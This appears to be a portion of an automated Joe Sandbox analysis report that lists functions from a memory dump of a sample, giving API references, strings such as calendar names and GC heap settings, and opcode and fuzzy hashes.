Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c3a55e49a23a19c6e99d4e2879a1303fdaddfc18d9bca4d098764dac0d00ba1
Instruction ID: f150abd4343743c62f1a1dd881ed94bc1e6d77abaf22e624b797d767bcbd156e
Opcode Fuzzy Hash: 8c3a55e49a23a19c6e99d4e2879a1303fdaddfc18d9bca4d098764dac0d00ba1
Instruction Fuzzy Hash: E7319313F3C142C6EA14EA2698419BD5751AF86FC4F648435ED1EC7B97DE2DE84683C0

Function 00007FF67FA71470 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
Instruction ID: 94010c0a1d66b74b9ce84ab4a54eee571a002ccc55d742466895c87b749a2b07
Opcode Fuzzy Hash: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
Instruction Fuzzy Hash: 7A21FC63B3824282EBA48B3EA2D5F7F13A1EB86790F442131EF0D83E5ADD1DD5818644

Function 00007FF67FB27A90 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58d2d3fb35aab4af4c2e43eeb53387022bca1717b85e2f8311d2cb9bfc17508
Instruction ID: 743cba38c8906e4e18c5822d67a9508aa5dd27a61adc8946a7a4824034fd204d
Opcode Fuzzy Hash: e58d2d3fb35aab4af4c2e43eeb53387022bca1717b85e2f8311d2cb9bfc17508
Instruction Fuzzy Hash: 2111E763B2524285EA15AE16F891AB99351AF95BD1F548431DF0C8BB86CE3CD4818384

Function 00007FF67FACF9C0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd73dc21319d55d5cd51ae119c2cd724b2eedb2a74dd1c6a194b4a6c8a9077be
Instruction ID: 6f3246b1690fb2933edcac914ad7a969efbb2c1e45018c396cdddc6c6279345e
Opcode Fuzzy Hash: fd73dc21319d55d5cd51ae119c2cd724b2eedb2a74dd1c6a194b4a6c8a9077be
Instruction Fuzzy Hash: C0F0F406F29006C5F90CBA325856AFF83A15F97B80F246834ED1D9B78BED1CD45253C5

Function 00007FF67FACFAA0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb870c6da8980ab108728cb2512e603d96d3e36e6137f51798ee13c9ceab7c4e
Instruction ID: 8641ef09276f2d636fc2ab760e4b7f11d98befdbb0b4ad4a81df51a0c30acc1c
Opcode Fuzzy Hash: bb870c6da8980ab108728cb2512e603d96d3e36e6137f51798ee13c9ceab7c4e
Instruction Fuzzy Hash: 5DE04F06E69107C5F90CBA665466BFAD3611F96740F245434EA2E9BB97ED2CA4028380

Function 00007FF67FAB9FC0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
Instruction ID: 10a474a5e7b646a8f2422ed2c1db864a53de92361c37be728195d3a677d4dbae
Opcode Fuzzy Hash: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
Instruction Fuzzy Hash: A1D0A705F7401AC0EC046E274C15CB683642F47FC0D646131EC1EA7B97ED0CD4034384

Function 00007FF67FAA90A0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 136COMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF67FAA9193
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF67FAA91B0

Strings

buddhist, xrefs: 00007FF67FAA91C3
dangi, xrefs: 00007FF67FAA91FD
persian, xrefs: 00007FF67FAA9217
roc, xrefs: 00007FF67FAA9265
gregorian, xrefs: 00007FF67FAA9189
japanese, xrefs: 00007FF67FAA91A6
hebrew, xrefs: 00007FF67FAA91E0
islamic-umalqura, xrefs: 00007FF67FAA924B
calendar, xrefs: 00007FF67FAA9102
islamic, xrefs: 00007FF67FAA9231

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: _stricmp
String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
API String ID: 2884411883-3649728362
Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
Instruction ID: 81a463ac0f9caec75f2dd293049cbdfef31d4148fa9193668a9c3ddc064d94dc
Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
Instruction Fuzzy Hash: 21514B26A2C643D1FA609B15EC10FBA63D4AF89B84F416032DD0EC66A5EF6DE449C3C0

Function 00007FF67FA4C1A0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C1DE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C206
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C226
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C246
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C266
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C28A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C2AE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF67FA52967,?,?,?,?,00007FF67FA4B845), ref: 00007FF67FA4C2D2

Strings

GCHeapHardLimitSOH, xrefs: 00007FF67FA4C21C
GCHeapHardLimitPOHPercent, xrefs: 00007FF67FA4C2C8
GCHeapHardLimitPercent, xrefs: 00007FF67FA4C1FC
GCHeapHardLimitPOH, xrefs: 00007FF67FA4C25C
GCHeapHardLimit, xrefs: 00007FF67FA4C1D7
GCHeapHardLimitLOH, xrefs: 00007FF67FA4C23C
GCHeapHardLimitSOHPercent, xrefs: 00007FF67FA4C280
GCHeapHardLimitLOHPercent, xrefs: 00007FF67FA4C2A4

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: strcmp
String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
API String ID: 1004003707-945519297
Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
Instruction ID: e3630c72b13685c2b2e74c9795578bd554d8e36ab172b658ba72c1c7ad0a303c
Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
Instruction Fuzzy Hash: F5410826A28A42C0FA50AB29A9409B55391AF46BF4F480371D87DD77E5EF6CE846C7C0

Function 00007FF67FA4B3B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF67FA45007), ref: 00007FF67FA4B3D3
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF67FA45007), ref: 00007FF67FA4B3E8
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF67FA45007), ref: 00007FF67FA4B3F5
InitializeContext.KERNEL32(?,?,?,?,?,00007FF67FA45007), ref: 00007FF67FA4B433
GetLastError.KERNEL32(?,?,?,?,?,00007FF67FA45007), ref: 00007FF67FA4B441
InitializeContext.KERNEL32(?,?,?,?,?,00007FF67FA45007), ref: 00007FF67FA4B495

Strings

kernel32.dll, xrefs: 00007FF67FA4B3CC
InitializeContext2, xrefs: 00007FF67FA4B3DE

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
Instruction ID: 3d4173e9ddd928dcb2c3127f4284827788a7431f16c1ab45230a401d865c34e1
Opcode Fuzzy Hash: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
Instruction Fuzzy Hash: A0312D23A29B46C2FA119FAAF440A7A6394EF45BD4F480435DD4D837A4DF7CE486C790

Function 00007FF67FA44E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF67FA4B731
GetProcAddress.KERNEL32 ref: 00007FF67FA4B741
GetLastError.KERNEL32 ref: 00007FF67FA4B794
SuspendThread.KERNEL32 ref: 00007FF67FA4B7AD
GetThreadContext.KERNEL32 ref: 00007FF67FA4B7C8
ResumeThread.KERNEL32 ref: 00007FF67FA4B7F2

Strings

QueueUserAPC2, xrefs: 00007FF67FA4B73A
kernel32, xrefs: 00007FF67FA4B724

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
String ID: QueueUserAPC2$kernel32
API String ID: 3714266957-4022151419
Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
Instruction ID: 124668e94336fc6f8789789c42da05f21c7efa18ddf0b0dbc15473226c3b742a
Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
Instruction Fuzzy Hash: EE316422A28B42C1EA509B1EE844B7A23A1AF46FE4F540231DD6DD7AE4DF3CE445C780

Function 00007FF67FA6BC40 Relevance: 9.2, APIs: 6, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
Instruction ID: 6711687e0f5c0788f70bb902a983d19b06d6993c5bbbf066085997045363c347
Opcode Fuzzy Hash: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
Instruction Fuzzy Hash: 2671D163A29782C2FB549F299540ABA63E4BF55BD4F184135EA1D87B96EF3CE440C3C0

Function 00007FF67FA80FE0 Relevance: 9.2, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67FA81090
DebugBreak.KERNEL32 ref: 00007FF67FA810CD
DebugBreak.KERNEL32 ref: 00007FF67FA810E8
DebugBreak.KERNEL32 ref: 00007FF67FA8111D
DebugBreak.KERNEL32 ref: 00007FF67FA81138
DebugBreak.KERNEL32 ref: 00007FF67FA811A9

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
Instruction ID: e3a0f0a5ca25afb8f0fc0d3e06e81dc411ebbb9bde10d598b843e399f66b578b
Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
Instruction Fuzzy Hash: 9E51C363B29A83C6EB56DB55C440ABD67A1FF85BA4F46413ACA1D83391DE7CE481C3C0

Function 00007FF67FA62770 Relevance: 9.1, APIs: 6, Instructions: 132threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67FA627B7
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA627CF
SwitchToThread.KERNEL32 ref: 00007FF67FA6288C
SwitchToThread.KERNEL32 ref: 00007FF67FA62895
SwitchToThread.KERNEL32 ref: 00007FF67FA628BF
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA62963

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSectionSwitchThread$Leave$Enter
String ID:
API String ID: 1765607624-0
Opcode ID: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
Instruction ID: bdf7585e3731b869b6dd507a1e764527e2a9f9895b99c6baa393f2cc4bac39ab
Opcode Fuzzy Hash: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
Instruction Fuzzy Hash: 44510833E38203C6FA549B6DAC51D7A23D1AF46B54F540235F56DC22E2EE2CB845D6C2

Function 00007FF67FA81DE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81E89
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81EA1
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81EB9
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81ED7
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF67FA81FB1,?,?,0000028DE53A8090,00007FF67FA814E2), ref: 00007FF67FA81EFC
DebugBreak.KERNEL32 ref: 00007FF67FA81F30

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
Instruction ID: ec049c0d1115669003ddac05c920691427e244c4256fee6c57c74383c8157338
Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
Instruction Fuzzy Hash: F141F863A286C2C2E792AF609000A7E67D1FF45BA4F180034EE4D97696CF7CE880C3D1

Function 00007FF67FA45260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67FA4B6A0: GetCurrentThreadId.KERNEL32 ref: 00007FF67FA4B6A4

GetCurrentProcess.KERNEL32 ref: 00007FF67FA452A6
GetCurrentThread.KERNEL32 ref: 00007FF67FA452AE
DuplicateHandle.KERNEL32 ref: 00007FF67FA452D2

Part of subcall function 00007FF67FA4CA20: VirtualQuery.KERNEL32 ref: 00007FF67FA4CA52

RaiseFailFastException.KERNEL32 ref: 00007FF67FA45300

Strings

, xrefs: 00007FF67FA45314

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-3916222277
